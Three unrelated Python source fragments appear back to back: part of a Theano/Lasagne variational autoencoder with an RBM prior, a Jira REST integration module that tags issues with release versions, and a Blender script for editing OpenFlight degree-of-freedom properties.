log_qz_given_x = log_bernoulli(z, qz_mu).sum(axis=1)
log_qz_given_x_dgz = log_bernoulli(dg(z), qz_mu).sum(axis=1)
log_qza_given_x = log_qz_given_x + log_qa_given_x
# log-probability term
z_prior = T.ones_like(z)*np.float32(0.5)
log_pz = log_bernoulli(z, z_prior).sum(axis=1)
log_e = -self.rbm.free_energy(z.reshape((128*n_sam,self.n_lat)))
log_px_given_z = log_bernoulli(x, px_mu).sum(axis=1)
log_pa_given_z = log_normal2(a, pa_mu, pa_logsigma).sum(axis=1)
log_pxz = log_pa_given_z + log_px_given_z + log_e
# save them for later
if deterministic == False:
self.log_pxz = log_pxz
self.log_px_given_z = log_px_given_z
self.log_pz = log_pz
self.log_qza_given_x = log_qza_given_x
self.log_qa_given_x = log_qa_given_x
self.log_qz_given_x = log_qz_given_x
self.log_qz_given_x_dgz = log_qz_given_x_dgz
self.log_e = log_e.mean()
self.z = z
# return log_paxz, log_qza_given_x
return log_pxz, log_qza_given_x
def create_objectives(self, deterministic=False):
# load probabilities
log_paxz, log_qza_given_x = self._create_components(deterministic=deterministic)
# compute the evidence lower bound
elbo = T.mean(log_paxz - log_qza_given_x)
log_qa_given_x = self.log_qa_given_x
# we don't use a spearate accuracy metric right now
return -elbo, T.mean(log_qa_given_x)
def create_gradients(self, loss, deterministic=False):
# load networks
l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, l_qa, l_qz, l_cv, c, v = self.network
# load params
p_params = lasagne.layers.get_all_params(
[l_px_mu, l_pa_mu, l_pa_logsigma], trainable=True)
qa_params = lasagne.layers.get_all_params(l_qa_mu, trainable=True)
qz_params = lasagne.layers.get_all_params(l_qz, trainable=True)
cv_params = lasagne.layers.get_all_params(l_cv, trainable=True)
# load neural net outputs (probabilities have been precomputed)
log_pxz, log_px_given_z, log_pz = self.log_pxz, self.log_px_given_z, self.log_pz
log_qza_given_x = self.log_qza_given_x
log_qz_given_x = self.log_qz_given_x
log_qz_given_x_dgz = self.log_qz_given_x_dgz
cv = T.addbroadcast(lasagne.layers.get_output(l_cv),1)
# compute learning signals
l0 = log_px_given_z + log_pz - log_qz_given_x - cv # NOTE: this disn't have q(a)
l_avg, l_var = l0.mean(), l0.var()
c_new = 0.8*c + 0.2*l_avg
v_new = 0.8*v + 0.2*l_var
l = (l0 - c_new) / T.maximum(1, T.sqrt(v_new))
l_target = (l0 - c_new) / T.maximum(1, T.sqrt(v_new))
# compute grad wrt p
p_grads = T.grad(-log_pxz.mean(), p_params)
# compute grad wrt q_a
elbo = T.mean(log_pxz - log_qza_given_x)
qa_grads = T.grad(-elbo, qa_params)
# compute grad wrt q_z
qz_target = T.mean(dg(l_target) * log_qz_given_x_dgz)
qz_grads = T.grad(-0.2*qz_target, qz_params) # 5x slower rate for q
# compute grad of cv net
cv_target = T.mean(l0**2)
cv_grads = [0.2*g for g in T.grad(cv_target, cv_params)]
# combine and clip gradients
clip_grad = 1
max_norm = 5
grads = p_grads + qa_grads + qz_grads + cv_grads
mgrads = lasagne.updates.total_norm_constraint(grads, max_norm=max_norm)
cgrads = [T.clip(g, -clip_grad, clip_grad) for g in mgrads]
return cgrads
def gen_samples(self, deterministic=False):
s = self.inputs[-1]
# put it through the decoder
_, _, l_px_in, _ = self.input_layers
l_px_mu = self.network[0]
px_mu = lasagne.layers.get_output(l_px_mu, {l_px_in : s})
return px_mu
def get_params(self):
# load networks
l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, \
l_qa, l_qz, l_cv, c, v = self.network
if self.model == 'gaussian':
raise NotImplementedError('The code below needs to implement Gaussians')
# load params
p_params = lasagne.layers.get_all_params(
[l_px_mu, l_pa_mu, l_pa_logsigma], trainable=True)
qa_params = lasagne.layers.get_all_params(l_qa_mu, trainable=True)
qz_params = lasagne.layers.get_all_params(l_qz, trainable=True)
cv_params = lasagne.layers.get_all_params(l_cv, trainable=True)
return p_params + qa_params + qz_params + cv_params
def create_updates(self, grads, params, alpha, opt_alg, opt_params):
# call super-class to generate SGD/ADAM updates
grad_updates = Model.create_updates(self, grads, params, alpha, opt_alg, opt_params)
# create updates for centering signal
# load neural net outputs (probabilities have been precomputed)
l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, l_qa, l_qz, l_cv, c, v = self.network
# load neural net outputs (probabilities have been precomputed)
log_pxz, log_px_given_z, log_pz = self.log_pxz, self.log_px_given_z, self.log_pz
log_qz_given_x = self.log_qz_given_x
cv = T.addbroadcast(lasagne.layers.get_output(l_cv),1)
# compute learning signals
l = log_px_given_z + log_pz - log_qz_given_x - cv
l_avg, l_var = l.mean(), l.var()
c_new = 0.8*c + 0.2*l_avg
v_new = 0.8*v + 0.2*l_var
# compute update for centering signal
cv_updates = {c: c_new, v: v_new}
return OrderedDict(grad_updates.items() + cv_updates.items())
def hallucinate(self):
"""Generate new samples by passing noise into the decoder"""
# load network params
size, n_lat, n_dim = 100, self.n_lat, self.n_dim
img_size = int(np.sqrt(size))
# # generate noisy inputs
# noise = self.gen_noise(size, n_lat).astype('float32')
# sample noise from RBM
noise = self.rbm.sample()
p_mu = self.dream(noise)
if p_mu is None:
return None
p_mu = p_mu.reshape((img_size, img_size, n_dim, n_dim))
# split into img_size (1,img_size,n_dim,n_dim) | |
<filename>flow/projecttracking/jira/jira.py
import base64
import json
import os
import re
import requests
from flow.buildconfig import BuildConfig
from flow.projecttracking.project_tracking_abc import Project_Tracking
import flow.utils.commons as commons
from flow.utils.commons import Object
#https://<site-url>/rest/api/3/<resource-name>
class Jira(Project_Tracking):
clazz = 'Jira'
token = None
user = None
project_keys = None
jira_url = None
jira_basic_auth = None
config = BuildConfig
http_timeout = 30
def __init__(self, config_override=None):
method = '__init__'
commons.print_msg(Jira.clazz, method, 'begin')
if config_override is not None:
self.config = config_override
Jira.token = os.getenv('JIRA_TOKEN')
Jira.user = os.getenv('JIRA_USER')
if not Jira.token:
if not Jira.user:
commons.print_msg(Jira.clazz, method, 'No jira user, jira token found in environment. Did you define '
'environment variables \'JIRA_USER\' and \'JIRA_TOKEN\'?', 'ERROR')
else:
commons.print_msg(Jira.clazz, method, 'No jira token found in environment. Did you define '
'environment variable \'JIRA_TOKEN\'?', 'ERROR')
exit(1)
elif not Jira.user:
commons.print_msg(Jira.clazz, method, 'No jira user found in environment. Did you define '
'environment variable \'JIRA_USER\'?', 'ERROR')
exit(1)
# Check for jira url first in buildConfig, second try settings.ini
try:
jira_json_config = self.config.json_config['projectTracking']['jira']
commons.print_msg(Jira.clazz, method, jira_json_config)
# noinspection PyUnboundLocalVariable
Jira.jira_url = jira_json_config['url']
except KeyError as e:
if e.args[0] == 'url':
if self.config.settings.has_section('jira') and self.config.settings.has_option('jira', 'url'):
Jira.jira_url = self.config.settings.get('jira', 'url')
else:
commons.print_msg(Jira.clazz, method, 'No jira url found in buildConfig or settings.ini.',
'ERROR')
exit(1)
else:
commons.print_msg(Jira.clazz,
method,
"The build config associated with projectTracking is missing key {}".format(str(e)),
'ERROR')
exit(1)
Jira.jira_basic_auth = base64.b64encode("{0}:{1}".format(Jira.user, Jira.token).encode('ascii')).decode('ascii')
try:
# since api call to get project data uses key or id just always call to fetch id.
if jira_json_config.get('projectKey') is not None and jira_json_config.get('projectKeys') is not None:
raise KeyError('projectKeys')
elif jira_json_config.get('projectKey') is not None:
project_data = self._retrieve_project_info(str(jira_json_config['projectKey']))
Jira.project_keys = [(project_data['id'], project_data['key'])]
elif jira_json_config.get('projectKeys') is not None:
Jira.project_keys = []
for project_key in jira_json_config.get('projectKeys'):
project_data = self._retrieve_project_info(str(project_key))
Jira.project_keys.append((project_data['id'], project_data['key']))
else:
raise KeyError('projectKey')
commons.print_msg(Jira.clazz, method, Jira.project_keys)
except KeyError as e:
if e.args[0] == 'projectKeys':
commons.print_msg(Jira.clazz,
method,
"The build config may only contain 'projectKey' for single project key"
" or 'projectKeys' containing an array of project keys",
'ERROR')
else:
commons.print_msg(Jira.clazz,
method,
"The build config associated with projectTracking is missing key {}".format(str(e)),
'ERROR')
exit(1)
commons.print_msg(Jira.clazz, method, 'end')
def get_details_for_all_stories(self, story_list):
method = 'get_details_for_all_stories'
commons.print_msg(Jira.clazz, method, 'begin')
story_details = []
commons.print_msg(Jira.clazz, method, story_list)
for i, story_id in enumerate(story_list):
story_detail = self._retrieve_story_detail(story_id)
if story_detail is not None:
story_details.append(story_detail)
commons.print_msg(Jira.clazz, method, story_details)
commons.print_msg(Jira.clazz, method, 'end')
return story_details
def _retrieve_project_info(self, project_id):
method = '_retrieve_project_info'
commons.print_msg(Jira.clazz, method, 'begin')
json_data = None
resp = None
project_detail = {'url': '{0}/rest/api/3/project/{1}'.format(Jira.jira_url, project_id)}
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
try:
commons.print_msg(Jira.clazz, method, project_detail['url'])
resp = requests.get(project_detail['url'], headers=headers, timeout=self.http_timeout)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, "Failed retrieving project detail from call to {}".format(
project_detail.get('url', '')), 'ERROR')
commons.print_msg(Jira.clazz, method, e, 'ERROR')
exit(1)
if resp.status_code == 200:
json_data = json.loads(resp.text)
commons.print_msg(Jira.clazz, method, "Project Key: {key}, Project Id: {id}".format(key=json_data['key'],
id=json_data['id']))
else:
commons.print_msg(Jira.clazz, method, "Failed retrieving project detail from call to {url}. \r\n "
"Response: {response}".format(url=project_detail.get('url', ''),
response=resp.text), 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
return json_data
def _retrieve_story_detail(self, story_id):
method = '_retrieve_story_detail'
commons.print_msg(Jira.clazz, method, 'begin')
json_data = None
resp = None
story_detail = {'url': '{0}/rest/api/3/issue/{1}'.format(Jira.jira_url, story_id)}
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
try:
commons.print_msg(Jira.clazz, method, story_detail['url'])
resp = requests.get(story_detail['url'], headers=headers, timeout=self.http_timeout)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, "Failed retrieving story detail from call to {}".format(
story_detail.get('url', '')), 'ERROR')
commons.print_msg(Jira.clazz, method, e, 'ERROR')
exit(1)
if resp.status_code == 200:
json_data = json.loads(resp.text)
commons.print_msg(Jira.clazz, method, json_data)
else:
commons.print_msg(Jira.clazz, method, "Failed retrieving story detail from call to {url}. \r\n "
"Response: {response}".format(url=story_detail.get('url', ''),
response=resp.text), 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
return json_data
def tag_stories_in_commit(self, story_list):
method = 'tag_stories_in_commit'
commons.print_msg(Jira.clazz, method, 'begin')
version = '{0}-{1}'.format(self.config.project_name, self.config.version_number)
self._add_version_to_project(version)
for story in story_list:
self._add_version_to_story(story, version)
commons.print_msg(Jira.clazz, method, 'end')
def _add_version_to_project(self, version):
method = '_add_version_to_project'
commons.print_msg(Jira.clazz, method, 'begin')
for idx, project_id in enumerate(self.project_keys):
does_version_exist = self._determine_if_project_version_exists(project_id[0], version.lower())
if does_version_exist:
commons.print_msg(Jira.clazz, method, 'Version {version} already exists for project {project}, skipping.'.format(version=version.lower(), project=project_id[1]))
else:
version_to_post = Object()
version_to_post.projectId = project_id[0]
version_to_post.name = version.lower()
jira_url = "{url}/rest/api/3/version".format(url=Jira.jira_url)
headers = {'Content-type': 'application/json', 'Accept': 'application/json',
'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
commons.print_msg(Jira.clazz, method, 'Post body for create project version:\n{}'.format(version_to_post.to_JSON()))
try:
resp = requests.post(jira_url, version_to_post.to_JSON(), headers=headers, timeout=self.http_timeout)
if resp.status_code != 201:
commons.print_msg(Jira.clazz, method, "Unable to create version {version} for project {project} \r\n "
"Response: {response}".format(version=version, project=project_id[1], response=resp.text), 'WARN')
else:
commons.print_msg(Jira.clazz, method, resp.text)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, 'Connection error. ' + str(e), 'WARN')
except Exception as e:
commons.print_msg(Jira.clazz, method, "Unable to create version {version} for project {project}".format(
version=version, project=project_id[1]), 'WARN')
commons.print_msg(Jira.clazz, method, e, 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
def _determine_if_project_version_exists(self, project_id, version):
method = '_determine_if_project_version_exists'
commons.print_msg(Jira.clazz, method, 'begin')
jira_url = "{url}/rest/api/3/project/{project}/versions".format(url=Jira.jira_url, project=project_id)
headers = {'Content-type': 'application/json', 'Accept': 'application/json',
'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
version_exists = False
try:
resp = requests.get(jira_url, headers=headers, timeout=self.http_timeout)
if resp.status_code != 200:
commons.print_msg(Jira.clazz, method, "Unable to fetch versions for project {project} \r\n "
"Response: {response}".format(project=project_id, response=resp.text), 'WARN')
return False
else:
project_versions = json.loads(resp.text)
version_exists = any(v['name'] == version for v in project_versions)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, 'Connection error. ' + str(e), 'WARN')
except Exception as e:
commons.print_msg(Jira.clazz, method, "Unable to fetch versions for project {project} \r\n "
"Response: {response}".format(project=project_id, response=resp.text), 'WARN')
commons.print_msg(Jira.clazz, method, e, 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
return version_exists
def _add_version_to_story(self, story_id, version):
method = '_add_version_to_story'
commons.print_msg(Jira.clazz, method, 'begin')
jira_url = "{url}/rest/api/3/issue/{id}".format(url = Jira.jira_url, id = story_id)
headers = {'Content-type': 'application/json', 'Accept': 'application/json',
'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
data = {
"update": {
"fixVersions": [
{
"add": {
"name": version.lower()
}
}
]
}
}
put_data = json.dumps(data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
commons.print_msg(Jira.clazz, method, jira_url)
try:
resp = requests.put(jira_url, put_data, headers=headers, timeout=self.http_timeout)
if resp.status_code != 204:
commons.print_msg(Jira.clazz, method, "Unable to add version {version} to issue {story} \r\n "
"Response: {response}".format(version=version, story=story_id, response=resp.text), 'WARN')
else:
commons.print_msg(Jira.clazz, method, resp.text)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, 'Connection error. ' + str(e), 'WARN')
except Exception as e:
commons.print_msg(Jira.clazz, method, "Unable to add version {version} for story {story}".format(
version=version, story=story_id), 'WARN')
commons.print_msg(Jira.clazz, method, e, 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
def determine_semantic_version_bump(self, story_details):
method = 'determine_semantic_version_bump'
commons.print_msg(Jira.clazz, method, 'begin')
bump_type = None
for i, story in enumerate(story_details):
#jira labels are global across all projects but could still be used
for j, label in enumerate(story.get('fields').get('labels')):
if label.lower() == 'major':
return 'major'
#jira components behave closest to tracker labels, are per project
for k, component in enumerate(story.get('fields').get('components')):
if component.get('name') == 'major':
return 'major'
story_type = story.get('fields').get('issuetype').get('name').lower()
if story_type == 'story' or story_type == 'chore' or story_type == 'release':
bump_type = 'minor'
elif story_type == 'bug' and bump_type is None:
bump_type = 'bug'
# This fall-through rule is needed because if there are no tracker
# stories present in the commits, we need to default to something,
# else calculate_next_semver will throw an error about getting 'None'
if bump_type is None:
bump_type = 'minor'
commons.print_msg(Jira.clazz, method, "bump type: {}".format(bump_type))
commons.print_msg(Jira.clazz, method, 'end')
return bump_type
def extract_story_id_from_commit_messages(self, commit_messages):
method = 'extract_story_id_from_commit_messages'
commons.print_msg(Jira.clazz, method, 'begin')
story_list = []
for commit_string in commit_messages:
# check if there is a starting bracket and if there are balanced brackets
if commit_string.count('[') > 0 and commit_string.count('[') == commit_string.count(']'):
# for each starting bracket
for m in re.finditer('\[', commit_string):
# find the next subsequent ending bracket
ending_bracket = commit_string.find(']', m.start())
# find the contents between the brackets
stories = commit_string[m.start()+1:ending_bracket]
# verify there isn't a embedded bracket, if so just skip this one and keep marching.
if stories.find('[') == -1: # there is a nested starting bracket
# now dig out the tracker number or jira key in single number format or multiple separated by commas.
r = re.compile('(?:[a-zA-Z]+\-[0-9]+,?)+(,([a-zA-Z]+\-[0-9]+,?))*,?')
stories_array = stories.split(',')
stories = list(filter(r.match, stories_array))
for story in stories:
# split out by comma.
if story not in story_list:
story_list.append(story)
commons.print_msg(Jira.clazz, method, "Story list: {}".format(story_list))
commons.print_msg(Jira.clazz, method, 'end')
return story_list
"""
This methods needs to return an array of stories with 4 specific fields for each story:
story_type
id
name
description
url
current_state
"""
def flatten_story_details(self, story_details):
method = 'flatten_story_details'
commons.print_msg(Jira.clazz, method, 'begin')
if story_details is None:
return None
story_release_notes = []
for story in story_details:
story_release_note_summary = {}
story_release_note_summary['story_type'] = story.get('fields').get('issuetype').get('name').lower()
story_release_note_summary['id'] | |
#!BPY
"""
Name: 'FLT DOF Editor'
Blender: 240
Group: 'Misc'
Tooltip: 'Degree of Freedom editor for FLT nodes'
"""
__author__ = "<NAME>"
__version__ = "1.0 11/21/07"
__email__ = ('scripts', 'Author, ')
__url__ = ('blender', 'blenderartists.org')
__bpydoc__ ="""\
This script provides tools for working with OpenFlight databases in Blender. OpenFlight is a
registered trademark of MultiGen-Paradigm, Inc.
Feature overview and more availible at:
http://wiki.blender.org/index.php/Scripts/Manual/FLTools
"""
# --------------------------------------------------------------------------
# flt_palettemanager.py version 0.1 2005/04/08
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# Copyright (C) 2007: Blender Foundation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
import Blender.Draw as Draw
from Blender.BGL import *
import Blender
import flt_properties
reload(flt_properties)
from flt_properties import *
#event codes
evcode = {
"DOF_MAKE" : 100,
"DOF_UPDATE" : 138,
"DOF_DELETE" : 101,
"DOF_TRANSX" : 102,
"DOF_TRANSY" : 103,
"DOF_TRANSZ" : 104,
"DOF_ROTX" : 105,
"DOF_ROTY" : 106,
"DOF_ROTZ" : 107,
"DOF_SCALEX" : 108,
"DOF_SCALEY" : 109,
"DOF_SCALEZ" : 110,
"DOF_MIN_TRANSX" : 111,
"DOF_MIN_TRANSY" : 112,
"DOF_MIN_TRANSZ" : 113,
"DOF_MIN_ROTX" : 114,
"DOF_MIN_ROTY" : 115,
"DOF_MIN_ROTZ" : 116,
"DOF_MIN_SCALEX" : 117,
"DOF_MIN_SCALEY" : 118,
"DOF_MIN_SCALEZ" : 119,
"DOF_MAX_TRANSX" : 120,
"DOF_MAX_TRANSY" : 121,
"DOF_MAX_TRANSZ" : 122,
"DOF_MAX_ROTX" : 123,
"DOF_MAX_ROTY" : 124,
"DOF_MAX_ROTZ" : 125,
"DOF_MAX_SCALEX" : 126,
"DOF_MAX_SCALEY" : 127,
"DOF_MAX_SCALEZ" : 128,
"DOF_STEP_TRANSX" : 129,
"DOF_STEP_TRANSY" : 130,
"DOF_STEP_TRANSZ" : 131,
"DOF_STEP_ROTX" : 132,
"DOF_STEP_ROTY" : 133,
"DOF_STEP_ROTZ" : 134,
"DOF_STEP_SCALEX" : 135,
"DOF_STEP_SCALEY" : 136,
"DOF_STEP_SCALEZ" : 137
}
#system
DOF_MAKE = None
DOF_UPDATE = None
DOF_DELETE = None
#toggle buttons
DOF_TRANSX = None
DOF_TRANSY = None
DOF_TRANSZ = None
DOF_ROTX = None
DOF_ROTY = None
DOF_ROTZ = None
DOF_SCALEX = None
DOF_SCALEY = None
DOF_SCALEZ = None
#Minimums
DOF_MIN_TRANSX = None
DOF_MIN_TRANSY = None
DOF_MIN_TRANSZ = None
DOF_MIN_ROTX = None
DOF_MIN_ROTY = None
DOF_MIN_ROTZ = None
DOF_MIN_SCALEX = None
DOF_MIN_SCALEY = None
DOF_MIN_SCALEZ = None
#maximums
DOF_MAX_TRANSX = None
DOF_MAX_TRANSY = None
DOF_MAX_TRANSZ = None
DOF_MAX_ROTX = None
DOF_MAX_ROTY = None
DOF_MAX_ROTZ = None
DOF_MAX_SCALEX = None
DOF_MAX_SCALEY = None
DOF_MAX_SCALEZ = None
#step
DOF_STEP_TRANSX = None
DOF_STEP_TRANSY = None
DOF_STEP_TRANSZ = None
DOF_STEP_ROTX = None
DOF_STEP_ROTY = None
DOF_STEP_ROTZ = None
DOF_STEP_SCALEX = None
DOF_STEP_SCALEY = None
DOF_STEP_SCALEZ = None
#labels
DOF_ROTSTRING = None
DOF_TRANSTRING = None
DOF_SCALESTRING = None
DOF_EDITLABEL = None
#make ID props easier/morereadable
zmin = '14d!ZMIN'
zmax = '15d!ZMAX'
zcur = '16d!ZCUR'
zstep = '17d!ZSTEP'
ymin = '18d!YMIN'
ymax = '19d!YMAX'
ycur = '20d!YCUR'
ystep = '21d!YSTEP'
xmin = '22d!XMIN'
xmax = '23d!XMAX'
xcur = '24d!XCUR'
xstep = '25d!XSTEP'
pitchmin = '26d!PITCH-MIN'
pitchmax = '27d!PITCH-MAX'
pitchcur = '28d!PITCH-CUR'
pitchstep = '29d!PITCH-STEP'
rollmin = '30d!ROLL-MIN'
rollmax = '31d!ROLL-MAX'
rollcur = '32d!ROLL-CUR'
rollstep = '33d!ROLL-STEP'
yawmin = '34d!YAW-MIN'
yawmax = '35d!YAW-MAX'
yawcur = '36d!YAW-CUR'
yawstep = '37d!YAW-STEP'
zscalemin = '38d!ZSIZE-MIN'
zscalemax = '39d!ZSIZE-MAX'
zscalecur = '40d!ZSIZE-CUR'
zscalestep = '41d!ZSIZE-STEP'
yscalemin = '42d!YSIZE-MIN'
yscalemax = '43d!YSIZE-MAX'
yscalecur = '44d!YSIZE-CUR'
yscalestep = '45d!YSIZE-STEP'
xscalemin = '46d!XSIZE-MIN'
xscalemax = '47d!XSIZE-MAX'
xscalecur = '48d!XSIZE-CUR'
xscalestep = '49d!XSIZE-STEP'
def update_state():
state = dict()
state["activeScene"] = Blender.Scene.GetCurrent()
state["activeObject"] = state["activeScene"].objects.active
if state["activeObject"] and not state["activeObject"].sel:
state["activeObject"] = None
state["activeMesh"] = None
if state["activeObject"] and state["activeObject"].type == 'Mesh':
state["activeMesh"] = state["activeObject"].getData(mesh=True)
state["activeFace"] = None
if state["activeMesh"]:
if state["activeMesh"].faceUV and state["activeMesh"].activeFace != None:
state["activeFace"] = state["activeMesh"].faces[state["activeMesh"].activeFace]
#update editmode
state["editmode"] = Blender.Window.EditMode()
return state
def idprops_append(object, typecode, props):
object.properties["FLT"] = dict()
object.properties["FLT"]['type'] = typecode
for prop in props:
object.properties["FLT"][prop] = props[prop]
object.properties["FLT"]['3t8!id'] = object.name
def idprops_kill():
state = update_state()
if state["activeObject"] and state["activeObject"].properties.has_key('FLT'):
state["activeObject"].properties.pop('FLT')
def idprops_copy(source):
state = update_state()
if source.properties.has_key('FLT'):
for object in state["activeScene"].objects:
if object.sel and object != source and (state["activeScene"].Layers & object.Layers):
idprops_kill(object)
object.properties['FLT'] = dict()
for key in source.properties['FLT']:
object.properties['FLT'][key] = source.properties['FLT'][key]
def select_by_typecode(typecode):
state = update_state()
for object in state["activeScene"].objects:
if object.properties.has_key('FLT') and object.properties['FLT']['type'] == typecode and state["activeScene"].Layers & object.Layers:
object.select(1)
def DOF_get_frame():
state = update_state()
if not state["activeObject"] and not id_props_type(state["activeObject"], 14):
return
#Warning! assumes 1 BU == 10 meters.
#do origin
state["activeObject"].properties['FLT']['5d!ORIGX'] = state["activeObject"].getLocation('worldspace')[0]*10.0
state["activeObject"].properties['FLT']['6d!ORIGY'] = state["activeObject"].getLocation('worldspace')[1]*10.0
state["activeObject"].properties['FLT']['7d!ORIGZ'] = state["activeObject"].getLocation('worldspace')[2]*10.0
#do X axis
x = Blender.Mathutils.Vector(1.0,0.0,0.0)
x = x * state["activeObject"].getMatrix('worldspace')
x = x * 10.0
state["activeObject"].properties['FLT']['8d!XAXIS-X'] = x[0]
state["activeObject"].properties['FLT']['9d!XAXIS-Y'] = x[1]
state["activeObject"].properties['FLT']['10d!XAXIS-Z'] = x[2]
#do X/Y plane
x = Blender.Mathutils.Vector(0.0,1.0,0.0)
x.normalize()
x = x * state["activeObject"].getMatrix('worldspace')
x = x * 10.0
state["activeObject"].properties['FLT']['11d!XYPLANE-X'] = x[0]
state["activeObject"].properties['FLT']['12d!XYPLANE-Y'] = x[1]
state["activeObject"].properties['FLT']['13d!XZPLANE-Z'] = x[2]
def idprops_type(object, typecode):
if object.properties.has_key('FLT') and object.properties['FLT'].has_key('type') and object.properties['FLT']['type'] == typecode:
return True
return False
#ui type code
def get_prop(typecode, prop):
state = update_state()
if state["activeObject"] and idprops_type(state["activeObject"], typecode):
props = state["activeObject"].properties['FLT']
else:
props = flt_properties.FLTDOF
return props[prop]
def set_prop(typecode, prop, value):
state = update_state()
if state["activeObject"] and idprops_type(state["activeObject"],typecode):
state["activeObject"].properties['FLT'][prop] = value
lockxtrans = (1 << 31)
lockytrans = (1 << 30)
lockztrans = (1 << 29)
lockxrot = (1 << 28)
lockyrot = (1 << 27)
lockzrot = (1 << 26)
lockxscale = (1 << 25)
lockyscale = (1 << 24)
lockzscale = (1 << 23)
def get_lockmask(mask):
state = update_state()
if state["activeObject"]:
flag = get_prop(14,'50I!FLAG')
if flag & mask:
return True
return False
def set_lockmask(mask):
state = update_state()
if state["activeObject"] and idprops_type(state["activeObject"], 14):
oldvalue = state["activeObject"].properties['FLT']['50I!FLAG']
oldvalue = struct.unpack('>I', struct.pack('>i', oldvalue))[0]
oldvalue |= mask
state["activeObject"].properties['FLT']['50I!FLAG'] = struct.unpack('>i', struct.pack(">I", oldvalue))[0]
def clear_lockmask(mask):
state = update_state()
if state["activeObject"] and idprops_type(state["activeObject"], 14):
oldvalue = state["activeObject"].properties['FLT']['50I!FLAG']
oldvalue = struct.unpack('>I', struct.pack('>i', oldvalue))[0]
oldvalue &= ~mask
state["activeObject"].properties['FLT']['50I!FLAG'] = struct.unpack('>i',struct.pack('>I',oldvalue))[0]
def create_dof():
state = update_state()
actobj = state["activeObject"]
if actobj and not idprops_type(actobj, 14):
idprops_kill()
idprops_append(actobj,14, flt_properties.FLTDOF)
DOF_get_frame()
def event(evt,val):
if evt == Draw.ESCKEY:
Draw.Exit()
def but_event(evt):
global DOF_MAKE
global DOF_UPDATE
global DOF_DELETE
global DOF_TRANSX
global DOF_TRANSY
global DOF_TRANSZ
global DOF_ROTX
global DOF_ROTY
global DOF_ROTZ
global DOF_SCALEX
global DOF_SCALEY
global DOF_SCALEZ
global DOF_MIN_TRANSX
global DOF_MIN_TRANSY
global DOF_MIN_TRANSZ
global DOF_MIN_ROTX
global DOF_MIN_ROTY
global DOF_MIN_ROTZ
global DOF_MIN_SCALEX
global DOF_MIN_SCALEY
global DOF_MIN_SCALEZ
global DOF_MAX_TRANSX
global DOF_MAX_TRANSY
global DOF_MAX_TRANSZ
global DOF_MAX_ROTX
global DOF_MAX_ROTY
global DOF_MAX_ROTZ
global DOF_MAX_SCALEX
global DOF_MAX_SCALEY
global DOF_MAX_SCALEZ
global DOF_STEP_TRANSX
global DOF_STEP_TRANSY
global DOF_STEP_TRANSZ
global DOF_STEP_ROTX
global DOF_STEP_ROTY
global DOF_STEP_ROTZ
global DOF_STEP_SCALEX
global DOF_STEP_SCALEY
global DOF_STEP_SCALEZ
#labels
global DOF_ROTSTRING
global DOF_TRANSTRING
global DOF_SCALESTRING
#masks
global lockxtrans
global lockytrans
global lockztrans
global lockxrot
global lockyrot
global lockzrot
global lockxscale
global lockyscale
global lockzscale
global zmin
global zmax
global zcur
global zstep
global ymin
global ymax
global ycur
global ystep
global xmin
global xmax
global xcur
global xstep
global pitchmin
global pitchmax
global pitchcur
global pitchstep
global rollmin
global rollmax
global rollcur
global rollstep
global yawmin
global yawmax
global yawcur
global yawstep
global zscalemin
global zscalemax
global zscalecur
global zscalestep
global yscalemin
global yscalemax
global yscalecur
global yscalestep
global xscalemin
global xscalemax
global xscalecur
global xscalestep
#do "system" events
if evt == evcode["DOF_MAKE"]:
create_dof()
if evt == evcode["DOF_UPDATE"]:
DOF_get_frame()
if evt == evcode["DOF_DELETE"]:
idprops_kill()
#do translation lock events
if evt == evcode["DOF_TRANSX"]:
if DOF_TRANSX.val == True:
set_lockmask(lockxtrans)
else:
clear_lockmask(lockxtrans)
if evt == evcode["DOF_TRANSY"]:
if DOF_TRANSY.val == True:
set_lockmask(lockytrans)
else:
clear_lockmask(lockytrans)
if evt == evcode["DOF_TRANSZ"]:
if DOF_TRANSZ.val == True:
set_lockmask(lockztrans)
else:
clear_lockmask(lockztrans)
#do rotation lock events
if evt == evcode["DOF_ROTX"]:
if DOF_ROTX.val == True:
set_lockmask(lockxrot)
else:
clear_lockmask(lockxrot)
if evt == evcode["DOF_ROTY"]:
if DOF_ROTY.val == True:
set_lockmask(lockyrot)
else:
clear_lockmask(lockyrot)
if evt == evcode["DOF_ROTZ"]:
if DOF_ROTZ.val == True:
set_lockmask(lockzrot)
else:
clear_lockmask(lockzrot)
#do scale lock events
if evt == evcode["DOF_SCALEX"]:
if DOF_SCALEX.val == True:
set_lockmask(lockxscale)
else:
clear_lockmask(lockxscale)
